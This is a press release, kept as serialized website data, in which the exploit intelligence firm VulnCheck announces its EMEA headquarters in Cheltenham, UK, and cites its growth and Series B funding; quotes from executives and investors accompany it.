Intelligence",[],[7740],{"name":7622,"avatar":7623,"link":7624,"linkName":7625},{"type":145,"value":7742,"toc":7809},[7743,7752,7758,7761,7768,7771,7777,7780,7787,7794,7797,7801,7804],[184,7744,7745,7633,7748,7751],{},[478,7746,7747],{},"LEXINGTON, Mass., February 19, 2026 —",[274,7749,7452],{"href":7750},"www.vulncheck.com",", the exploit intelligence company, today announced it is establishing its EMEA headquarters in Cheltenham, United Kingdom, following a year of regional growth, including 319% year-over-year EMEA ARR growth and 100% customer growth. The move will strengthen VulnCheck’s ability to support customers across Europe, the Middle East and Africa as demand for exploit intelligence increases.",[7524,7753,7755],{"author":7449,"position":7754},"CEO of VulnCheck",[184,7756,7757],{},"EMEA has quickly become one of our fastest-growing regions globally. Establishing our EMEA headquarters in Cheltenham brings us closer to customers and partners while investing in a well-established U.K. cyber ecosystem. The depth of talent and collaboration here makes it the right location for our continued international growth.",[184,7759,7760],{},"Cheltenham is a key hub within the U.K.’s cyber sector, anchored by a strong public-private security community, leading academic institutions and a fast-growing cluster of cyber companies. VulnCheck’s new office will serve as its regional hub for customer engagement, partnerships and talent expansion, reinforcing the company’s long-term commitment to the U.K. market and beyond.",[7524,7762,7765],{"author":7763,"position":7764},"Phil Clement","Head of inward investment, growth and enterprise team at Gloucestershire County Council",[184,7766,7767],{},"I am delighted that U.S. firm VulnCheck have chosen Cheltenham in Gloucestershire for their U.K. base, as they grow the business after a successful fund raise. 
With demand increasing for cyber risk assessments, the company is well placed to utilise the talent pool in the Gloucestershire cluster and is a welcome addition to our cyber community.",[184,7769,7770],{},"The opening follows VulnCheck’s $25 million Series B funding round led by Sorenson Capital, with participation from National Grid Partners and existing investors, including Ten Eleven Ventures and In-Q-Tel. The investment brings the company’s total funding to $45 million and supports continued product innovation and global expansion.",[7524,7772,7774],{"author":7646,"position":7773},"Vice President, National Grid Partners",[184,7775,7776],{},"At National Grid Partners, we invest in technologies that strengthen resilience at scale. VulnCheck’s strong growth across EMEA reflects the urgency of today’s cyber threats and the value of its exploit and vulnerability intelligence platform. We’re excited to support the company’s expansion in the U.K. and beyond.",[184,7778,7779],{},"Last year, VulnCheck was selected as one of four finalists for the 2025 Black Hat Europe Startup Spotlight competition, underscoring its growing recognition within the global cybersecurity community. In 2024, the company participated in international cyber growth initiatives supported by Plexal, accelerating its engagement with the U.K. ecosystem and building relationships that helped pave the way for its Cheltenham expansion. Plexal is an innovation and growth company that strengthens the U.K.’s technology capabilities through collaboration.",[7524,7781,7784],{"author":7782,"position":7783},"Saj Huq","CCO at Plexal",[184,7785,7786],{},"We’re excited to welcome VulnCheck to the U.K., having collaborated with the team to support their international expansion. Establishing its EMEA HQ in the U.K. is a fantastic validator of our national cyber sector, which is buzzing with innovation, talent and solutions, so the team will certainly feel at home. 
VulnCheck is increasingly becoming a key technology partner to mission-critical organisations globally and their decision to grow in the U.K. further underscores the importance of international collaboration and interoperability across global partners. This also further validates Cheltenham's global relevance as a thriving cyber, technology and national security ecosystem – something that we’ve long been committed to supporting at Plexal. We look forward to building our existing relationship with VulnCheck and celebrating their continued success!",[184,7788,7789,7790,1201],{},"To learn more about VulnCheck and its exploit intelligence solutions, visit ",[274,7791,7750],{"href":7792,"rel":7793},"http:\u002F\u002Fwww.vulncheck.com",[278],[7795,7796],"hr",{},[1346,7798,7799],{"id":301},[478,7800,302],{},[184,7802,7803],{},"VulnCheck closes the exploitation-timing gap by enabling security teams to operate on attacker timelines instead of disclosure timelines. By delivering machine-consumable, evidence-driven intelligence on when vulnerabilities become exploitable and how attackers actually use them, VulnCheck helps organizations prepare earlier, respond decisively, and verify exploitation without relying on scores or delayed consensus. 
Follow the company on LinkedIn or X.",[184,7805,7716,7806,1201],{},[274,7807,7451],{"href":7451,"rel":7808},[278],{"title":148,"searchDepth":149,"depth":149,"links":7810},[7811],{"id":301,"depth":1498,"text":302},"2026-02-19","Company expands international presence following 319% year-over-year EMEA ARR growth and 100% customer growth",{"slug":7815},"vulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence","\u002Fpress\u002Fvulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence",{"title":7737,"description":7813},"press\u002Fvulncheck-establishes-emea-headquarters-in-cheltenham-uk-amid-soaring-global-demand-for-exploit-intelligence","2Uq97nzn4XhrliITx1sCqGuqsXp_yJx9TUf3E9GnHuc",[7821],{"id":7822,"extension":8,"list":7823,"meta":7842,"stem":7843,"__hash__":7844},"quotes\u002Fquotes.yml",[7824,7829,7834,7837],{"quote":7825,"name":7826,"position":7827,"avatar":7828,"index":1474},"VulnCheck’s superpower is its ability to discover vulnerability intelligence that other solutions are unable to access, acquire, and have no ability to find - which is the key to security since you can’t secure what you don’t know about. Its deep and talented team with cross-disciplinary expertise in vulnerability research and exploit development gives them a perspective on the threat landscape that we have not seen anywhere else in the industry. 
The VulnCheck team is providing unique threat insights with much deeper exploit context that organizations formerly had no ability to find.","Tony Spinelli","Venture Partner at Sorenson Ventures","https:\u002F\u002Fwww.sorensoncapital.com\u002Fwp-content\u002Fuploads\u002F2023\u002F11\u002FTony-Spinelli-cropped-website-headshot.png",{"quote":7830,"name":7831,"position":7832,"avatar":7833,"index":149},"The core problem with existing solutions such as NVD is that vulnerability data alone does not give security teams enough context to help them prioritize remediation efforts. By enriching vulnerability data with information about exploit activity, VulnCheck is giving security teams the coveted ability to prioritize remediation of vulnerabilities based on a real-time assessment of exploit weaponization.","Katie Gray","Senior Partner at In-Q-Tel","https:\u002F\u002Fcybersecuritysummit.com\u002Fwp-content\u002Fuploads\u002F2018\u002F07\u002FGray-250x300-1-wpcf_200x240.jpg",{"quote":7835,"name":7449,"position":7836,"avatar":7503,"index":1498},"Our team’s mission is to autonomously gather and leverage exploit and vulnerability intelligence to manage the world’s vulnerabilities at scale. The investments we’ve secured show strong confidence in our vision. We are thrilled to be working with these strategic partners to fuel our next stage of growth.","Founder at VulnCheck",{"quote":7838,"name":7839,"position":7840,"avatar":7841,"index":1536},"VulnCheck's hypergrowth highlights its unique ability to address one of today's most pressing organizational challenges. As cybersecurity specialist investors, we backed VulnCheck because the current paradigms for threat intelligence and vulnerability management are fundamentally flawed. They require too much human intervention to distill the information needed to prioritize action. VulnCheck is disrupting these legacy approaches by autonomously collecting and integrating exploit and vulnerability intelligence at scale. 
Founder Anthony Bettini's unparalleled technical expertise, steady leadership, and disciplined approach to product development further cement the company's position as a game-changer in the industry.","Mark Hatfield","Founder \u002F General Partner, Ten Eleven Ventures","https:\u002F\u002Fwww.1011vc.com\u002Fwp-content\u002Fuploads\u002FTenEleven-Mark-Hatfield-Headshot.png",{},"quotes","lhJYzn0xmhA72_zvTMIXRwJRJ8z81BvOwuLTwqiaLfY",1776469823896]